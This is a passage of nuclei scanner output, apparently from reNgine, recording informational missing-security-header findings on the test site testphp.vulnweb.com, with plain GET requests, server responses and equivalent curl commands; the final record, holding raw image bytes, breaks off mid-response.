Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:41.587323106Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:42.235291246Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:42.235293593Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:42.235331631Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:42.235341945Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\u